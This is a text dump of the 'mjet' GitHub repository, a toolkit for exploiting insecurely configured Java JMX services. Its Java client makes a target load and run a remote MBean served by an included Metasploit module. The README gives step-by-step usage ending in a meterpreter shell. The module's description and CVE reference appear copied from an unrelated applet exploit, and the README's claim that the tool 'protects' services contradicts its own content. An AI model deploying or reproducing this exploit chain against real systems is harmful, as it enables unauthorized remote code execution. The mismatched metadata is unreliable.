Repository: mogwaisec/mjet
Branch: master
Commit: 20210c1286a9
Files: 15
Total size: 14.5 KB
Directory structure:
gitextract_d35drckt/
├── LICENSE
├── README.md
├── metasploit/
│ └── java_mlet_server.rb
├── mjet.jar
└── src/
└── java/
├── metasploit/
│ └── MetasploitBean/
│ ├── .classpath
│ ├── .project
│ ├── .settings/
│ │ └── org.eclipse.jdt.core.prefs
│ └── src/
│ └── metasploit/
│ ├── Metasploit.java
│ ├── MetasploitMBean.java
│ └── Payload.java
└── mjet/
├── .classpath
├── .project
├── .settings/
│ └── org.eclipse.jdt.core.prefs
├── lib/
│ └── commons-cli-1.2.jar
└── src/
└── de/
└── mogwaisecurity/
└── lab/
└── mjet/
└── Mjet.java
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
The MIT License (MIT)
Copyright (c) 2015 Mogwai Security
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# mjet
Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit
mjet is a tool that can be used to protect insecure configured JMX services. It is based on
the blog post "Exploiting JMX-RMI" from Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi"
and can be used to execute arbitrary Metasploit payloads on the target system.
Mjet was originally planned to be a complete attack toolkit, however we noticed that the Metasploit Github repository contains
a pull request which will provide basic Java RMI/serialization support in native ruby. This is awesome and removes the Java
dependency. So we stopped developing this tool and create metasploit modules in the near future.
mjet consists of the following parts:
- A metasploit module which emulates a "mlet Server". This is basically a web server which hosts a html file that contains a mlet tag
- A ManagedBean that is changed by the mlet server module to include the selected payload
- A jar archive that is used to contact the insecure JMX service.
### Installation (with the github version of Metasploit)
- Copy the "MBean" folder to "data/java/metasploit"
- Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
### Usage
The example uses following systems:
attacker: 192.168.178.1
target: 192.168.178.200, JMX service running on tcp port 1616
- Configure/start the metasploit module "java_mlet_server". The module will run as a background job
```
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
```
Use mjet.jar to connect to the vulnerable JMX service and provide the URL to the MLet Web server...
```
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
```
and enjoy your meterpreter shell :-)
================================================
FILE: metasploit/java_mlet_server.rb
================================================
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Mlet Server',
'Description' => %q{
This module abuses the JMX classes from a Java Applet to run arbitrary Java
code outside of the sandbox as exploited in the wild in January of 2013. The
vulnerability affects Java version 7u10 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'egypt', # Metasploit module
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-0422' ]
],
'Platform' => %w{ java linux osx win },
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 10 2013'
))
end
def setup
path = File.join(Msf::Config.data_directory, "java", "metasploit", "MBean", "Metasploit.class")
@mbean_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.data_directory, "java", "metasploit", "MBean", "MetasploitMBean.class")
@interface_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
#@exploit_class_name = rand_text_alpha("Exploit".length)
#@exploit_class.gsub!("Exploit", @exploit_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("metasploit/Metasploit.class", @mbean_class)
jar.add_file("metasploit/MetasploitMBean.class", @interface_class)
#metasploit_str = rand_text_alpha("metasploit".length)
#payload_str = rand_text_alpha("payload".length)
#jar.entries.each { |entry|
# entry.name.gsub!("metasploit", metasploit_str)
# entry.name.gsub!("Payload", payload_str)
# entry.data = entry.data.gsub("metasploit", metasploit_str)
# entry.data = entry.data.gsub("Payload", payload_str)
#}
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_html
html = %Q|<mlet code=metasploit.Metasploit archive=#{rand_text_alpha(8)}.jar name=#{rand_text_alpha(8)}:name=#{rand_text_alpha(8)},id=#{rand_text_alpha(8)} ></mlet>|
# return html
end
end
================================================
FILE: src/java/metasploit/MetasploitBean/.classpath
================================================
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="src" path="src"/>
<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6"/>
<classpathentry kind="output" path="bin"/>
</classpath>
================================================
FILE: src/java/metasploit/MetasploitBean/.project
================================================
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>MetasploitBean</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>
================================================
FILE: src/java/metasploit/MetasploitBean/.settings/org.eclipse.jdt.core.prefs
================================================
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.6
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.6
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Metasploit.java
================================================
package metasploit;
public class Metasploit implements MetasploitMBean {
public void run() {
Payload.main(null);
}
}
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/MetasploitMBean.java
================================================
package metasploit;
public interface MetasploitMBean {
public void run();
}
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Payload.java
================================================
package metasploit;
public class Payload {
public static void main(String[] args) {
System.out.println("bla bla bla");
}
}
================================================
FILE: src/java/mjet/.classpath
================================================
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="src" path="src"/>
<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6"/>
<classpathentry kind="lib" path="lib/commons-cli-1.2.jar"/>
<classpathentry kind="output" path="bin"/>
</classpath>
================================================
FILE: src/java/mjet/.project
================================================
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>mjet</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>
================================================
FILE: src/java/mjet/.settings/org.eclipse.jdt.core.prefs
================================================
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.6
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.6
================================================
FILE: src/java/mjet/src/de/mogwaisecurity/lab/mjet/Mjet.java
================================================
package de.mogwaisecurity.lab.mjet;
import org.apache.commons.cli.*;
import javax.management.remote.*;
import javax.management.*;
import java.util.*;
public class Mjet {
/**
* @param args
*/
public static void main(String[] args) {
System.out.println("---------------------------------------------------");
System.out.println("MJET - Mogwai Security JMX Exploitation Toolkit 0.1");
System.out.println("---------------------------------------------------");
System.out.println();
CommandLineParser parser = new org.apache.commons.cli.BasicParser();
Options cmdOptions = createCmdOptions();
CommandLine cmd= null;
try {
cmd = parser.parse(cmdOptions, args);
}
catch(ParseException exp) {
System.err.println( "[-] Error: " + exp.getMessage());
System.err.println();
// automatically generate the help statement
HelpFormatter formatter = new HelpFormatter();
formatter.printHelp( "mjet", cmdOptions );
System.exit(1);
}
pwnJMXService(cmd);
}
private static Options createCmdOptions()
{
Options cmdOptions = new Options();
// Required arguments
Option targetOption = OptionBuilder.withArgName("host").hasArg().withDescription("target host").isRequired(true).create('t');
Option portOption = OptionBuilder.withArgName("port").hasArg().withDescription("target service port").isRequired(true).create('p');
Option urlOption = OptionBuilder.withArgName("url").hasArg().withDescription("url of the mlet web server").isRequired(true).create('u');
targetOption.setLongOpt("target");
portOption.setLongOpt("port");
urlOption.setLongOpt("url");
cmdOptions.addOption(targetOption);
cmdOptions.addOption(portOption);
cmdOptions.addOption(urlOption);
// Optional arguments
Option helpOption = new Option("help", false, "show this help");
cmdOptions.addOption(helpOption);
return cmdOptions;
}
static void pwnJMXService(CommandLine line) {
try {
String serverName = line.getOptionValue("t");
String servicePort = line.getOptionValue("p");
String mLetUrl = line.getOptionValue("u");
JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + serverName + ":" + servicePort + "/jmxrmi");
System.out.println("[+] Connecting to JMX URL: "+url +" ...");
JMXConnector connector = JMXConnectorFactory.connect(url);
MBeanServerConnection mBeanServer = connector.getMBeanServerConnection();
System.out.println("[+] Connected: " + connector.getConnectionId());
ObjectInstance payloadBean = null;
System.out.println("[+] Trying to create MLet bean...");
ObjectInstance mLetBean = null;
try {
mLetBean = mBeanServer.createMBean("javax.management.loading.MLet", null);
} catch (javax.management.InstanceAlreadyExistsException e) {
mLetBean = mBeanServer.getObjectInstance(new ObjectName("DefaultDomain:type=MLet"));
}
System.out.println("[+] Loaded "+mLetBean.getClassName());
System.out.println("[+] Loading malicious MBean from " + mLetUrl);
System.out.println("[+] Invoking: "+mLetBean.getClassName() + ".getMBeansFromURL");
Object res = mBeanServer.invoke(mLetBean.getObjectName(), "getMBeansFromURL",
new Object[] { mLetUrl },
new String[] { String.class.getName() }
);
HashSet res_set = ((HashSet)res);
Iterator itr = res_set.iterator();
Object nextObject = itr.next();
if (nextObject instanceof Exception) {
throw ((Exception)nextObject);
}
payloadBean = ((ObjectInstance)nextObject);
System.out.println("[+] Loaded class: "+ payloadBean.getClassName());
System.out.println("[+] Loaded MBean Server ID: "+ payloadBean.getObjectName());
System.out.println("[+] Invoking: "+ payloadBean.getClassName()+".run()");
mBeanServer.invoke(payloadBean.getObjectName(), "run", new Object[]{}, new String[]{});
System.out.println("[+] Done");
} catch (Exception e) {
e.printStackTrace();
}
}
}
gitextract_d35drckt/
├── LICENSE
├── README.md
├── metasploit/
│ └── java_mlet_server.rb
├── mjet.jar
└── src/
└── java/
├── metasploit/
│ └── MetasploitBean/
│ ├── .classpath
│ ├── .project
│ ├── .settings/
│ │ └── org.eclipse.jdt.core.prefs
│ └── src/
│ └── metasploit/
│ ├── Metasploit.java
│ ├── MetasploitMBean.java
│ └── Payload.java
└── mjet/
├── .classpath
├── .project
├── .settings/
│ └── org.eclipse.jdt.core.prefs
├── lib/
│ └── commons-cli-1.2.jar
└── src/
└── de/
└── mogwaisecurity/
└── lab/
└── mjet/
└── Mjet.java
SYMBOL INDEX (15 symbols across 5 files)
FILE: metasploit/java_mlet_server.rb
class Metasploit3 (line 9) | class Metasploit3 < Msf::Exploit::Remote
method initialize (line 14) | def initialize( info = {} )
method setup (line 71) | def setup
method on_request_uri (line 82) | def on_request_uri(cli, request)
method generate_html (line 115) | def generate_html
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Metasploit.java
class Metasploit (line 4) | public class Metasploit implements MetasploitMBean {
method run (line 5) | public void run() {
FILE: src/java/metasploit/MetasploitBean/src/metasploit/MetasploitMBean.java
type MetasploitMBean (line 3) | public interface MetasploitMBean {
method run (line 4) | public void run();
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Payload.java
class Payload (line 3) | public class Payload {
method main (line 6) | public static void main(String[] args) {
FILE: src/java/mjet/src/de/mogwaisecurity/lab/mjet/Mjet.java
class Mjet (line 9) | public class Mjet {
method main (line 14) | public static void main(String[] args) {
method createCmdOptions (line 43) | private static Options createCmdOptions()
method pwnJMXService (line 67) | static void pwnJMXService(CommandLine line) {
Condensed preview — 15 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (17K chars).
[
{
"path": "LICENSE",
"chars": 1083,
"preview": "The MIT License (MIT)\n\nCopyright (c) 2015 Mogwai Security\n\nPermission is hereby granted, free of charge, to any person o"
},
{
"path": "README.md",
"chars": 2473,
"preview": "# mjet\nMogwai Security Java Management Extensions (JMX) Exploitation Toolkit\n\nmjet is a tool that can be used to protect"
},
{
"path": "metasploit/java_mlet_server.rb",
"chars": 4111,
"preview": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metaspl"
},
{
"path": "src/java/metasploit/MetasploitBean/.classpath",
"chars": 295,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classpath>\n\t<classpathentry kind=\"src\" path=\"src\"/>\n\t<classpathentry kind=\"con\" "
},
{
"path": "src/java/metasploit/MetasploitBean/.project",
"chars": 373,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<projectDescription>\n\t<name>MetasploitBean</name>\n\t<comment></comment>\n\t<projects"
},
{
"path": "src/java/metasploit/MetasploitBean/.settings/org.eclipse.jdt.core.prefs",
"chars": 587,
"preview": "eclipse.preferences.version=1\norg.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled\norg.eclipse.jdt.core.compi"
},
{
"path": "src/java/metasploit/MetasploitBean/src/metasploit/Metasploit.java",
"chars": 134,
"preview": "package metasploit;\n\n \npublic class Metasploit implements MetasploitMBean {\n public void run() {\n \tPayload.main(n"
},
{
"path": "src/java/metasploit/MetasploitBean/src/metasploit/MetasploitMBean.java",
"chars": 83,
"preview": "package metasploit;\n\npublic interface MetasploitMBean {\n public void run();\n}\n\n\n"
},
{
"path": "src/java/metasploit/MetasploitBean/src/metasploit/Payload.java",
"chars": 132,
"preview": "package metasploit;\n\npublic class Payload {\n\n\n\tpublic static void main(String[] args) {\n\t\tSystem.out.println(\"bla bla bl"
},
{
"path": "src/java/mjet/.classpath",
"chars": 356,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classpath>\n\t<classpathentry kind=\"src\" path=\"src\"/>\n\t<classpathentry kind=\"con\" "
},
{
"path": "src/java/mjet/.project",
"chars": 363,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<projectDescription>\n\t<name>mjet</name>\n\t<comment></comment>\n\t<projects>\n\t</proje"
},
{
"path": "src/java/mjet/.settings/org.eclipse.jdt.core.prefs",
"chars": 587,
"preview": "eclipse.preferences.version=1\norg.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled\norg.eclipse.jdt.core.compi"
},
{
"path": "src/java/mjet/src/de/mogwaisecurity/lab/mjet/Mjet.java",
"chars": 4320,
"preview": "package de.mogwaisecurity.lab.mjet;\n\nimport org.apache.commons.cli.*;\nimport javax.management.remote.*;\nimport javax.man"
}
]
// ... and 2 more files (download for full content)
About this extraction
This page contains the full source code of the mogwaisec/mjet GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 15 files (14.5 KB), approximately 4.2k tokens, and a symbol index with 15 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.